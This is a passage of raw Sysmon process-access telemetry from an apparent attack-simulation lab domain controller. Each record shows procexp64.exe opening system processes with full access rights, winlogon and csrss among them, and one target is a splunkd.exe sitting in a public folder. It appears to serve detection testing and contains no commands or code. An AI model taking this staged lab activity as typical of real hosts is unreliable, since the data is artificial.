10341000x8000000000000000787662Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787661Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787660Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787659Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787658Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787657Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787656Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787655Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787654Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787653Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787652Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787651Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787650Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787649Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787648Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787647Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787646Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787645Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 